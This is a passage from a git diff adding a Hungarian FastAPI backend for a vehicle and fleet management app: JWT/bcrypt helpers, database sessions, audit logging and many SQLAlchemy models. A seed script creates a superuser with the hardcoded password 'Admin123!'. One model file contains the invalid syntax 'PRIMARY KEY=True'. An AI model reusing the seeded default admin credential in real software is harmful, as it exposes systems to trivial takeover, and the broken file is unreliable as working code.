' + ) + try: + sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY')) + response = sg.send(message) + return True + except Exception as e: + print(f"Email hiba: {e}") + return False diff --git a/backend/app/core/security.py b/backend/app/core/security.py new file mode 100755 index 0000000..84e8621 --- /dev/null +++ b/backend/app/core/security.py @@ -0,0 +1,33 @@ +from datetime import datetime, timedelta, timezone +from typing import Optional, Dict, Any + +import bcrypt +from jose import jwt, JWTError + +from app.core.config import settings + +# --- JELSZÓ --- +def verify_password(plain_password: str, hashed_password: str) -> bool: + try: + if not hashed_password: + return False + return bcrypt.checkpw( + plain_password.encode("utf-8"), + hashed_password.encode("utf-8"), + ) + except Exception: + return False + +def get_password_hash(password: str) -> str: + salt = bcrypt.gensalt() + return bcrypt.hashpw(password.encode("utf-8"), salt).decode("utf-8") + +# --- JWT --- +def create_access_token(data: Dict[str, Any], expires_delta: Optional[timedelta] = None) -> str: + to_encode = dict(data) + expire = datetime.now(timezone.utc) + (expires_delta or timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)) + to_encode.update({"exp": expire}) + return jwt.encode(to_encode, settings.SECRET_KEY, algorithm=settings.ALGORITHM) + +def decode_token(token: str) -> Dict[str, Any]: + return jwt.decode(token, settings.SECRET_KEY, algorithms=[settings.ALGORITHM]) diff --git a/backend/app/crud/__init__.py b/backend/app/crud/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/backend/app/database.py b/backend/app/database.py new file mode 100755 index 0000000..42c21e6 --- /dev/null +++ b/backend/app/database.py @@ -0,0 +1,11 @@ +from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession, async_sessionmaker +from sqlalchemy.orm import DeclarativeBase + +# A .env fájlból olvassuk majd, de teszthez: +DATABASE_URL = "postgresql+asyncpg://user:password@db_container_name:5432/db_name" + +engine = create_async_engine(DATABASE_URL, echo=True) +SessionLocal = async_sessionmaker(autocommit=False, autoflush=False, bind=engine, class_=AsyncSession) + +class Base(DeclarativeBase): + pass \ No newline at end of file diff --git a/backend/app/db/__init__.py b/backend/app/db/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/backend/app/db/__pycache__/__init__.cpython-312.pyc b/backend/app/db/__pycache__/__init__.cpython-312.pyc new file mode 100755 index 0000000..ffe4d0a Binary files /dev/null and b/backend/app/db/__pycache__/__init__.cpython-312.pyc differ diff --git a/backend/app/db/__pycache__/base.cpython-312.pyc b/backend/app/db/__pycache__/base.cpython-312.pyc new file mode 100755 index 0000000..beade1b Binary files /dev/null and b/backend/app/db/__pycache__/base.cpython-312.pyc differ diff --git a/backend/app/db/__pycache__/session.cpython-312.pyc b/backend/app/db/__pycache__/session.cpython-312.pyc new file mode 100755 index 0000000..35d690c Binary files /dev/null and b/backend/app/db/__pycache__/session.cpython-312.pyc differ diff --git a/backend/app/db/base.py b/backend/app/db/base.py new file mode 100755 index 0000000..ddae7f4 --- /dev/null +++ b/backend/app/db/base.py @@ -0,0 +1,10 @@ +from sqlalchemy.ext.asyncio import AsyncAttrs +from sqlalchemy.orm import DeclarativeBase + + +class Base(AsyncAttrs, DeclarativeBase): + """ + Base class for all SQLAlchemy models. + Includes AsyncAttrs to support async attribute access (lazy loading). + """ + pass \ No newline at end of file diff --git a/backend/app/db/context.py b/backend/app/db/context.py new file mode 100755 index 0000000..e4406d6 --- /dev/null +++ b/backend/app/db/context.py @@ -0,0 +1,38 @@ +from typing import Generator, Optional, Dict, Any +from fastapi import Request +from app.db.session import get_conn + +def _set_config(cur, key: str, value: str) -> None: + cur.execute("SELECT set_config(%s, %s, false);", (key, value)) + +def db_tx(request: Request) -> Generator[Dict[str, Any], None, None]: + """ + Egységes DB tranzakció + session context: + BEGIN + set_config(app.tenant_org_id, app.account_id, app.is_platform_admin) + COMMIT/ROLLBACK + """ + conn = get_conn() + try: + cur = conn.cursor() + cur.execute("BEGIN;") + + claims: Optional[dict] = getattr(request.state, "claims", None) + if claims: + org_id = claims.get("org_id") or "" + account_id = claims.get("sub") or "" + is_platform_admin = claims.get("is_platform_admin", False) + + # Fontos: set_config stringeket vár + _set_config(cur, "app.tenant_org_id", str(org_id)) + _set_config(cur, "app.account_id", str(account_id)) + _set_config(cur, "app.is_platform_admin", "true" if is_platform_admin else "false") + + yield {"conn": conn, "cur": cur} + + conn.commit() + except Exception: + conn.rollback() + raise + finally: + conn.close() diff --git a/backend/app/db/middleware.py b/backend/app/db/middleware.py new file mode 100755 index 0000000..bd5cc23 --- /dev/null +++ b/backend/app/db/middleware.py @@ -0,0 +1,31 @@ +from fastapi import Request +from app.db.session import SessionLocal +from app.services.config_service import config +from sqlalchemy import text +import json + +async def audit_log_middleware(request: Request, call_next): + logging_enabled = await config.get_setting('audit_log_enabled', default=True) + + response = await call_next(request) + + if logging_enabled and request.method != 'GET': # GET-et általában nem naplózunk a zaj miatt, de állítható + try: + user_id = getattr(request.state, 'user_id', None) # Ha már be van lépve + + async with SessionLocal() as db: + await db.execute(text(""" + INSERT INTO data.audit_logs (user_id, action, endpoint, method, ip_address) + VALUES (:u, :a, :e, :m, :ip) + """), { + 'u': user_id, + 'a': f'API_CALL_{request.method}', + 'e': str(request.url.path), + 'm': request.method, + 'ip': request.client.host + }) + await db.commit() + except Exception: + pass # A naplózás hibája nem akaszthatja meg a kiszolgálást + + return response diff --git a/backend/app/db/session.py b/backend/app/db/session.py new file mode 100755 index 0000000..d616a62 --- /dev/null +++ b/backend/app/db/session.py @@ -0,0 +1,31 @@ +from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession, async_sessionmaker +from app.core.config import settings +from typing import AsyncGenerator + +engine = create_async_engine( + settings.DATABASE_URL, # A te eredeti kulcsod + echo=getattr(settings, "DEBUG", False), + future=True, + pool_size=20, + max_overflow=10 +) + +AsyncSessionLocal = async_sessionmaker( + engine, + class_=AsyncSession, + expire_on_commit=False, + autoflush=False +) +# Ez a sor kell, mert a main.py és a többiek ezen a néven keresik +SessionLocal = AsyncSessionLocal + +async def get_db() -> AsyncGenerator[AsyncSession, None]: + async with AsyncSessionLocal() as session: + try: + yield session + await session.commit() + except Exception: + await session.rollback() + raise + finally: + await session.close() \ No newline at end of file diff --git a/backend/app/final_admin_fix.py b/backend/app/final_admin_fix.py new file mode 100755 index 0000000..39b9203 --- /dev/null +++ b/backend/app/final_admin_fix.py @@ -0,0 +1,37 @@ +import asyncio +from sqlalchemy import text +from app.db.session import SessionLocal, engine +from app.models.user import User, UserRole +from app.core.security import get_password_hash + +async def run_fix(): + async with SessionLocal() as db: + # 1. Ellenőrizzük az oszlopokat (biztonsági játék) + res = await db.execute(text("SELECT column_name FROM information_schema.columns WHERE table_schema = \u0027data\u0027 AND table_name = \u0027users\u0027")) + cols = [r[0] for r in res.fetchall()] + print(f"INFO: Meglévő oszlopok: {cols}") + + if "hashed_password" not in cols: + print("❌ HIBA: A hashed_password oszlop még mindig hiányzik! A migráció nem volt sikeres.") + return + + # 2. Admin létrehozása + res = await db.execute(text("SELECT id FROM data.users WHERE email = :e"), {"e": "admin@profibot.hu"}) + if res.fetchone(): + print("⚠ Az admin@profibot.hu már létezik.") + else: + admin = User( + email="admin@profibot.hu", + hashed_password=get_password_hash("Admin123!"), + first_name="Admin", + last_name="Profibot", + role=UserRole.ADMIN, + is_superuser=True, + is_active=True + ) + db.add(admin) + await db.commit() + print("✅ SIKER: Admin felhasználó létrehozva!") + +if __name__ == "__main__": + asyncio.run(run_fix()) diff --git a/backend/app/init_db_direct.py b/backend/app/init_db_direct.py new file mode 100755 index 0000000..ca574fe --- /dev/null +++ b/backend/app/init_db_direct.py @@ -0,0 +1,13 @@ +import asyncio +from app.db.base import Base +from app.db.session import engine +from app.models import * # Minden modellt beimportálunk + +async def init_db(): + async with engine.begin() as conn: + # Ez a parancs hozza létre a táblákat a modellek alapján + await conn.run_sync(Base.metadata.create_all) + print("✅ Minden tábla sikeresen létrejött a 'data' sémában!") + +if __name__ == "__main__": + asyncio.run(init_db()) diff --git a/backend/app/main.py b/backend/app/main.py new file mode 100755 index 0000000..a98d4fd --- /dev/null +++ b/backend/app/main.py @@ -0,0 +1,45 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware +from sqlalchemy import text +import os +from app.api.v1.api import api_router +from app.api.v2.auth import router as auth_v2_router +from app.models import Base + +@asynccontextmanager +async def lifespan(app: FastAPI): + from app.db.session import engine + async with engine.begin() as conn: + await conn.execute(text("CREATE SCHEMA IF NOT EXISTS data")) + await conn.run_sync(Base.metadata.create_all) + yield + await engine.dispose() + +app = FastAPI( + title="Traffic Ecosystem SuperApp 2.0", + version="2.0.0", + openapi_url="/api/v2/openapi.json", + lifespan=lifespan +) + +app.add_middleware( + CORSMiddleware, + allow_origins=[ + "http://192.168.100.43:3000", # A szerver címe a böngészőben + "http://localhost:3000", # Helyi teszteléshez + ], + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + + +# ÚTVONALAK INTEGRÁCIÓJA +app.include_router(api_router, prefix="/api/v1") +app.include_router(auth_v2_router, prefix="/api/v2/auth") + +@app.get("/", tags=["health"]) +async def root(): + return {"status": "online", "version": "2.0.0", "docs": "/docs"} + \ No newline at end of file diff --git a/backend/app/models/__init__.py b/backend/app/models/__init__.py new file mode 100755 index 0000000..cfd7330 --- /dev/null +++ b/backend/app/models/__init__.py @@ -0,0 +1,24 @@ +from app.db.base import Base +from .user import User, UserRole +from .company import Company, CompanyMember, VehicleAssignment +from .vehicle import ( + Vehicle, + VehicleOwnership, + VehicleBrand, + EngineSpec, + ServiceProvider, + ServiceRecord, + VehicleCategory, + VehicleModel, + VehicleVariant +) + +# Alias a kompatibilitás kedvéért +UserVehicle = Vehicle + +__all__ = [ + "Base", "User", "UserRole", "Vehicle", "VehicleOwnership", "VehicleBrand", + "EngineSpec", "ServiceProvider", "ServiceRecord", "Company", + "CompanyMember", "VehicleAssignment", "UserVehicle", "VehicleCategory", + "VehicleModel", "VehicleVariant" +] \ No newline at end of file diff --git a/backend/app/models/__pycache__/__init__.cpython-312.pyc b/backend/app/models/__pycache__/__init__.cpython-312.pyc new file mode 100755 index 0000000..4e78382 Binary files /dev/null and b/backend/app/models/__pycache__/__init__.cpython-312.pyc differ diff --git a/backend/app/models/__pycache__/company.cpython-312.pyc b/backend/app/models/__pycache__/company.cpython-312.pyc new file mode 100755 index 0000000..3bdb19b Binary files /dev/null and b/backend/app/models/__pycache__/company.cpython-312.pyc differ diff --git a/backend/app/models/__pycache__/user.cpython-312.pyc b/backend/app/models/__pycache__/user.cpython-312.pyc new file mode 100755 index 0000000..c715640 Binary files /dev/null and b/backend/app/models/__pycache__/user.cpython-312.pyc differ diff --git a/backend/app/models/__pycache__/vehicle.cpython-312.pyc b/backend/app/models/__pycache__/vehicle.cpython-312.pyc new file mode 100755 index 0000000..26918c9 Binary files /dev/null and b/backend/app/models/__pycache__/vehicle.cpython-312.pyc differ diff --git a/backend/app/models/company.py b/backend/app/models/company.py new file mode 100755 index 0000000..9bdb0ee --- /dev/null +++ b/backend/app/models/company.py @@ -0,0 +1,63 @@ +from sqlalchemy import Column, Integer, String, Boolean, ForeignKey, DateTime +from sqlalchemy.orm import relationship +from sqlalchemy.sql import func +from sqlalchemy.dialects.postgresql import ENUM as PG_ENUM, UUID +from app.db.base import Base +import enum + +# A Python enum marad, de a Column definíciónál pontosítunk +class CompanyRole(str, enum.Enum): + OWNER = "owner" + MANAGER = "manager" + DRIVER = "driver" + +class Company(Base): + __tablename__ = "companies" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + tax_number = Column(String, nullable=True) + subscription_tier = Column(String, default="free") + owner_id = Column(Integer, ForeignKey("data.users.id"), nullable=False) + + members = relationship("CompanyMember", back_populates="company", cascade="all, delete-orphan") + assignments = relationship("VehicleAssignment", back_populates="company") + +class CompanyMember(Base): + __tablename__ = "company_members" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + company_id = Column(Integer, ForeignKey("data.companies.id"), nullable=False) + user_id = Column(Integer, ForeignKey("data.users.id"), nullable=False) + + # JAVÍTÁS: Kifejezetten megadjuk a natív Postgres típust + role = Column( + PG_ENUM('owner', 'manager', 'driver', name='companyrole', schema='data', create_type=False), + nullable=False + ) + + can_edit_service = Column(Boolean, default=False) + can_see_costs = Column(Boolean, default=False) + is_active = Column(Boolean, default=True) + + company = relationship("Company", back_populates="members") + user = relationship("User") + +class VehicleAssignment(Base): + __tablename__ = "vehicle_assignments" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + company_id = Column(Integer, ForeignKey("data.companies.id"), nullable=False) + vehicle_id = Column(UUID(as_uuid=True), ForeignKey("data.vehicles.id"), nullable=False) + driver_id = Column(Integer, ForeignKey("data.users.id"), nullable=False) + + start_date = Column(DateTime(timezone=True), server_default=func.now()) + end_date = Column(DateTime(timezone=True), nullable=True) + notes = Column(String, nullable=True) + + company = relationship("Company", back_populates="assignments") + vehicle = relationship("Vehicle") # Itt már a Vehicle-re hivatkozunk + driver = relationship("User", foreign_keys=[driver_id]) \ No newline at end of file diff --git a/backend/app/models/core_logic.py b/backend/app/models/core_logic.py new file mode 100755 index 0000000..9c80bc2 --- /dev/null +++ b/backend/app/models/core_logic.py @@ -0,0 +1,42 @@ +from sqlalchemy import Column, Integer, String, ForeignKey, Boolean, DateTime, JSON, Numeric +from sqlalchemy.orm import relationship +from sqlalchemy.sql import func +from app.db.base import Base + +class SubscriptionTier(Base): + __tablename__ = "subscription_tiers" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + name = Column(String, unique=True) # Free, Premium, VIP, Custom + rules = Column(JSON) # {"max_vehicles": 5, "allow_api": true} + is_custom = Column(Boolean, default=False) + +class OrganizationSubscription(Base): + __tablename__ = "org_subscriptions" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + org_id = Column(Integer, ForeignKey("data.organizations.id")) + tier_id = Column(Integer, ForeignKey("data.subscription_tiers.id")) + valid_from = Column(DateTime, server_default=func.now()) + valid_until = Column(DateTime) + is_active = Column(Boolean, default=True) + +class CreditTransaction(Base): + __tablename__ = "credit_logs" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + org_id = Column(Integer, ForeignKey("data.organizations.id")) + amount = Column(Numeric(10, 2)) + description = Column(String) + created_at = Column(DateTime, server_default=func.now()) + +class ServiceSpecialty(Base): + """Fa struktúra a szerviz szolgáltatásokhoz""" + __tablename__ = "service_specialties" + __table_args__ = {"schema": "data"} + id = Column(Integer, primary_key=True) + parent_id = Column(Integer, ForeignKey("data.service_specialties.id"), nullable=True) + name = Column(String, nullable=False) + slug = Column(String, unique=True) + + parent = relationship("ServiceSpecialty", remote_side=[id], backref="children") diff --git a/backend/app/models/email_log.py b/backend/app/models/email_log.py new file mode 100755 index 0000000..75f50bd --- /dev/null +++ b/backend/app/models/email_log.py @@ -0,0 +1,17 @@ +from sqlalchemy import Column, Integer, String, DateTime, ForeignKey +from sqlalchemy.sql import func +from app.db.base import Base + +class EmailLog(Base): + __tablename__ = "email_logs" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + user_id = Column(Integer, nullable=True) # Hozzáadva + recipient = Column(String, index=True) # Hozzáadva + email = Column(String, index=True) + email_type = Column(String) # Frissítve a kódhoz + type = Column(String) # Megtartva a kompatibilitás miatt + provider_id = Column(Integer) # Hozzáadva + status = Column(String) # Hozzáadva + sent_at = Column(DateTime(timezone=True), server_default=func.now()) diff --git a/backend/app/models/email_provider.py b/backend/app/models/email_provider.py new file mode 100755 index 0000000..42f9a09 --- /dev/null +++ b/backend/app/models/email_provider.py @@ -0,0 +1,21 @@ +from sqlalchemy import Column, Integer, String, Boolean, JSON, Float +from app.db.base import Base + +class EmailProviderConfig(Base): + __tablename__ = "email_provider_configs" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String(50), unique=True) # Pl: SendGrid_Main, Office365_Backup + provider_type = Column(String(20)) # SENDGRID, SMTP, MAILGUN + priority = Column(Integer, default=1) # 1 = legfontosabb + + # JSON-ban tároljuk a paramétereket (host, port, api_key, user, stb.) + settings = Column(JSON, nullable=False) + + is_active = Column(Boolean, default=True) + + # Failover figyelés + fail_count = Column(Integer, default=0) + max_fail_threshold = Column(Integer, default=3) # Hány hiba után kapcsoljon le? + success_rate = Column(Float, default=100.0) # Statisztika az adminnak diff --git a/backend/app/models/email_system.py b/backend/app/models/email_system.py new file mode 100755 index 0000000..9a0b13a --- /dev/null +++ b/backend/app/models/email_system.py @@ -0,0 +1,30 @@ +from sqlalchemy import Column, Integer, String, Boolean, DateTime, ForeignKey, Text, Numeric +from sqlalchemy.sql import func +from app.db.base import Base + +class EmailProvider(Base): + __tablename__ = 'email_providers' + __table_args__ = {'schema': 'data'} + id = Column(Integer, PRIMARY KEY=True) + name = Column(String(50), nullable=False) + priority = Column(Integer, default=1) + provider_type = Column(String(10), default='SMTP') + host = Column(String(255)) + port = Column(Integer) + username = Column(String(255)) + password_hash = Column(String(255)) + is_active = Column(Boolean, default=True) + daily_limit = Column(Integer, default=300) + current_daily_usage = Column(Integer, default=0) + +class EmailLog(Base): + __tablename__ = 'email_logs' + __table_args__ = {'schema': 'data'} + id = Column(Integer, PRIMARY KEY=True) + user_id = Column(Integer, ForeignKey('data.users.id'), nullable=True) + email_type = Column(String(50)) + recipient = Column(String(255)) + provider_id = Column(Integer, ForeignKey('data.email_providers.id')) + status = Column(String(20)) + sent_at = Column(DateTime(timezone=True), server_default=func.now()) + error_message = Column(Text) diff --git a/backend/app/models/email_template.py b/backend/app/models/email_template.py new file mode 100755 index 0000000..67ed983 --- /dev/null +++ b/backend/app/models/email_template.py @@ -0,0 +1,17 @@ +from sqlalchemy import Column, Integer, String, Text, Enum +import enum +from app.db.base import Base + +class EmailType(str, enum.Enum): + REGISTRATION = "REGISTRATION" + PASSWORD_RESET = "PASSWORD_RESET" + GDPR_NOTICE = "GDPR_NOTICE" + +class EmailTemplate(Base): + __tablename__ = "email_templates" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + type = Column(Enum(EmailType), unique=True, index=True) + subject = Column(String(255), nullable=False) + body_html = Column(Text, nullable=False) # Adminról szerkeszthető HTML tartalom diff --git a/backend/app/models/expense.py b/backend/app/models/expense.py new file mode 100755 index 0000000..86168c8 --- /dev/null +++ b/backend/app/models/expense.py @@ -0,0 +1,50 @@ +import enum +from sqlalchemy import Column, Integer, String, ForeignKey, Enum, DateTime, Boolean, Date, JSON +from sqlalchemy.sql import func +from app.db.base import Base + +# Költség Kategóriák +class ExpenseCategory(str, enum.Enum): + PURCHASE_PRICE = "PURCHASE_PRICE" # Vételár + TRANSFER_TAX = "TRANSFER_TAX" # Vagyonszerzési illeték + ADMIN_FEE = "ADMIN_FEE" # Eredetiség, forgalmi, törzskönyv + VEHICLE_TAX = "VEHICLE_TAX" # Gépjárműadó + INSURANCE = "INSURANCE" # Biztosítás + REFUELING = "REFUELING" # Tankolás + SERVICE = "SERVICE" # Szerviz / Javítás + PARKING = "PARKING" # Parkolás + TOLL = "TOLL" # Autópálya matrica + FINE = "FINE" # Bírság + TUNING_ACCESSORIES = "TUNING_ACCESSORIES" # Extrák + OTHER = "OTHER" # Egyéb + +class VehicleEvent(Base): + __tablename__ = "vehicle_events" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + vehicle_id = Column(Integer, ForeignKey("data.user_vehicles.id"), nullable=False) + + # Esemény típusa + event_type = Column(Enum(ExpenseCategory, schema="data", name="expense_category_enum"), nullable=False) + + date = Column(Date, nullable=False) + + # Kilométeróra (KÖTELEZŐ!) + odometer_value = Column(Integer, nullable=False) + odometer_anomaly = Column(Boolean, default=False) # Ha csökkenést észlelünk, True lesz + + # Pénzügyek + cost_amount = Column(Integer, nullable=False, default=0) # HUF + + # Leírás és Képek + description = Column(String, nullable=True) + image_paths = Column(JSON, nullable=True) # Lista a feltöltött képek (számla, fotó) útvonalairól + + # Kapcsolat a szolgáltatóval + # Ha is_diy=True, akkor a user maga csinálta. + # Ha is_diy=False és service_provider_id=None, akkor ismeretlen helyen készült. + is_diy = Column(Boolean, default=False) + service_provider_id = Column(Integer, ForeignKey("data.service_providers.id"), nullable=True) + + created_at = Column(DateTime(timezone=True), server_default=func.now()) \ No newline at end of file diff --git a/backend/app/models/gamification.py b/backend/app/models/gamification.py new file mode 100755 index 0000000..7576baa --- /dev/null +++ b/backend/app/models/gamification.py @@ -0,0 +1,70 @@ +from datetime import datetime +from typing import Optional +from sqlalchemy import ForeignKey, String, Integer, DateTime, func, Boolean +from sqlalchemy.orm import Mapped, mapped_column +from app.db.base import Base + +# Közös beállítás az összes táblához ebben a fájlban +SCHEMA_ARGS = {"schema": "data"} + +class PointRule(Base): + __tablename__ = "point_rules" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + action_key: Mapped[str] = mapped_column(String, unique=True, index=True) + points: Mapped[int] = mapped_column(Integer, default=0) + description: Mapped[Optional[str]] = mapped_column(String) + is_active: Mapped[bool] = mapped_column(Boolean, default=True) + +class LevelConfig(Base): + __tablename__ = "level_configs" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + level_number: Mapped[int] = mapped_column(Integer, unique=True) + min_points: Mapped[int] = mapped_column(Integer) + rank_name: Mapped[str] = mapped_column(String) + +class RegionalSetting(Base): + __tablename__ = "regional_settings" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + country_code: Mapped[str] = mapped_column(String, unique=True) + currency: Mapped[str] = mapped_column(String, default="HUF") + is_active: Mapped[bool] = mapped_column(Boolean, default=True) + +class PointsLedger(Base): + __tablename__ = "points_ledger" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + # JAVÍTVA: data.users.id hivatkozás + user_id: Mapped[int] = mapped_column(Integer, ForeignKey("data.users.id")) + points: Mapped[int] = mapped_column(Integer) + reason: Mapped[str] = mapped_column(String) + created_at: Mapped[datetime] = mapped_column(DateTime, default=func.now()) + +class UserStats(Base): + __tablename__ = "user_stats" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + # JAVÍTVA: data.users.id hivatkozás + user_id: Mapped[int] = mapped_column(Integer, ForeignKey("data.users.id"), unique=True) + total_points: Mapped[int] = mapped_column(Integer, default=0) + current_level: Mapped[int] = mapped_column(Integer, default=1) + last_activity: Mapped[datetime] = mapped_column(DateTime, default=func.now()) + +class Badge(Base): + __tablename__ = "badges" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + name: Mapped[str] = mapped_column(String, unique=True) + description: Mapped[str] = mapped_column(String) + icon_url: Mapped[Optional[str]] = mapped_column(String) + +class UserBadge(Base): + __tablename__ = "user_badges" + __table_args__ = SCHEMA_ARGS + id: Mapped[int] = mapped_column(Integer, primary_key=True, index=True) + # JAVÍTVA: data.users.id hivatkozás + user_id: Mapped[int] = mapped_column(Integer, ForeignKey("data.users.id")) + badge_id: Mapped[int] = mapped_column(Integer, ForeignKey("data.badges.id")) + earned_at: Mapped[datetime] = mapped_column(DateTime, default=func.now()) \ No newline at end of file diff --git a/backend/app/models/history.py b/backend/app/models/history.py new file mode 100755 index 0000000..1df733e --- /dev/null +++ b/backend/app/models/history.py @@ -0,0 +1,63 @@ +# /opt/service_finder/backend/app/models/history.py + +from sqlalchemy import Column, Integer, String, DateTime, ForeignKey, JSON, Date, Text +from sqlalchemy.orm import relationship +from sqlalchemy.sql import func +from app.db.base import Base + +# --- 1. Jármű Birtoklási Előzmények (Ownership History) --- +# Ez a tábla mondja meg, kié volt az autó egy adott időpillanatban. +# Így biztosítjuk, hogy a régi tulajdonos adatai védve legyenek az újtól. +class VehicleOwnership(Base): + __tablename__ = "vehicle_ownerships" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + + # Kapcsolatok + vehicle_id = Column(Integer, ForeignKey("data.user_vehicles.id"), nullable=False) + user_id = Column(Integer, ForeignKey("data.users.id"), nullable=False) + + # Időszak + start_date = Column(Date, nullable=False, default=func.current_date()) # Mikor került hozzá + end_date = Column(Date, nullable=True) # Ha NULL, akkor ő a jelenlegi tulajdonos! + + # Jegyzet (pl. adásvételi szerződés száma) + notes = Column(Text, nullable=True) + + # SQLAlchemy kapcsolatok (visszahivatkozások a fő modellekben kellenek majd) + vehicle = relationship("UserVehicle", back_populates="ownership_history") + user = relationship("User", back_populates="owned_vehicles") + + +# --- 2. Audit Log (A "Fekete Doboz") --- +# Minden kritikus módosítást itt tárolunk. Ez a rendszer "igazságügyi naplója". +class AuditLog(Base): + __tablename__ = "audit_logs" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + + # KI? (A felhasználó, aki a műveletet végezte) + user_id = Column(Integer, ForeignKey("data.users.id"), nullable=True) + + # MIT? (Milyen objektumot érintett?) + target_type = Column(String, index=True) # pl. "vehicle", "cost", "user_profile" + target_id = Column(Integer, index=True) # pl. az autó ID-ja + + # HOGYAN? + action = Column(String, nullable=False) # CREATE, UPDATE, DELETE, LOGIN_FAILED, EXPORT_DATA + + # RÉSZLETEK (Mi változott?) + # Pl: {"field": "odometer", "old_value": 150000, "new_value": 120000} <- Visszatekerés gyanú! + changes = Column(JSON, nullable=True) + + # BIZTONSÁG + ip_address = Column(String, nullable=True) # Honnan jött a kérés? + user_agent = Column(String, nullable=True) # Milyen böngészőből? + + # MIKOR? + timestamp = Column(DateTime(timezone=True), server_default=func.now()) + + # Kapcsolat (Opcionális, csak ha le akarjuk kérdezni a user adatait a logból) + user = relationship("User") \ No newline at end of file diff --git a/backend/app/models/legal.py b/backend/app/models/legal.py new file mode 100755 index 0000000..ce5fac1 --- /dev/null +++ b/backend/app/models/legal.py @@ -0,0 +1,29 @@ +from sqlalchemy import Column, Integer, String, Text, DateTime, ForeignKey, Boolean +from sqlalchemy.sql import func +from app.db.base import Base + +class LegalDocument(Base): + __tablename__ = "legal_documents" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + title = Column(String(255)) + content = Column(Text, nullable=False) + version = Column(String(20), nullable=False) + + region_code = Column(String(5), default="HU") + language = Column(String(5), default="hu") + + is_active = Column(Boolean, default=True) + created_at = Column(DateTime(timezone=True), server_default=func.now()) + +class LegalAcceptance(Base): + __tablename__ = "legal_acceptances" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + user_id = Column(Integer, ForeignKey("data.users.id")) + document_id = Column(Integer, ForeignKey("data.legal_documents.id")) + accepted_at = Column(DateTime(timezone=True), server_default=func.now()) + ip_address = Column(String(45)) + user_agent = Column(Text) diff --git a/backend/app/models/logistics.py b/backend/app/models/logistics.py new file mode 100755 index 0000000..d5a76ca --- /dev/null +++ b/backend/app/models/logistics.py @@ -0,0 +1,25 @@ +from sqlalchemy import Column, Integer, String, Enum +from app.db.base import Base +import enum + +# Enum definiálása +class LocationType(str, enum.Enum): + stop = "stop" # Megálló / Parkoló + warehouse = "warehouse" # Raktár + client = "client" # Ügyfél címe + +class Location(Base): + __tablename__ = "locations" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + + # FONTOS: Itt is megadjuk a schema="data"-t, hogy ne a public sémába akarja írni! + type = Column(Enum(LocationType, schema="data", name="location_type_enum"), nullable=False) + + # Koordináták (egyelőre String, később PostGIS) + coordinates = Column(String, nullable=True) + address_full = Column(String, nullable=True) + + capacity = Column(Integer, nullable=True) \ No newline at end of file diff --git a/backend/app/models/organization.py b/backend/app/models/organization.py new file mode 100755 index 0000000..9cfe124 --- /dev/null +++ b/backend/app/models/organization.py @@ -0,0 +1,36 @@ +import enum +from sqlalchemy import Column, Integer, String, Boolean, Enum, DateTime +from sqlalchemy.orm import relationship +from sqlalchemy.sql import func +from app.db.base import Base + +class OrgType(str, enum.Enum): + INDIVIDUAL = "individual" + SERVICE = "service" + FLEET_OWNER = "fleet_owner" + CLUB = "club" + +class UITheme(str, enum.Enum): + LIGHT = "light" + DARK = "dark" + SYSTEM = "system" + +class Organization(Base): + __tablename__ = "organizations" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + name = Column(String, nullable=False) + org_type = Column(Enum(OrgType), default=OrgType.INDIVIDUAL) + + # Új UI beállítások a V2-höz + theme = Column(Enum(UITheme), default=UITheme.SYSTEM) + logo_url = Column(String, nullable=True) + + is_active = Column(Boolean, default=True) + created_at = Column(DateTime(timezone=True), server_default=func.now()) + updated_at = Column(DateTime(timezone=True), onupdate=func.now()) + + # Kapcsolatok + # members = relationship("OrganizationMember", back_populates="organization") + vehicles = relationship("UserVehicle", back_populates="current_org") diff --git a/backend/app/models/organization_member.py b/backend/app/models/organization_member.py new file mode 100755 index 0000000..023daed --- /dev/null +++ b/backend/app/models/organization_member.py @@ -0,0 +1,26 @@ +import enum +from sqlalchemy import Column, Integer, String, Boolean, Enum, ForeignKey +from sqlalchemy.orm import relationship +from app.db.base import Base + +# Átnevezve OrgUserRole-ra, hogy ne ütközzön a globális UserRole-al +class OrgUserRole(str, enum.Enum): + OWNER = "OWNER" + ADMIN = "ADMIN" + FLEET_MANAGER = "FLEET_MANAGER" + DRIVER = "DRIVER" + +class OrganizationMember(Base): + __tablename__ = "organization_members" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + org_id = Column(Integer, 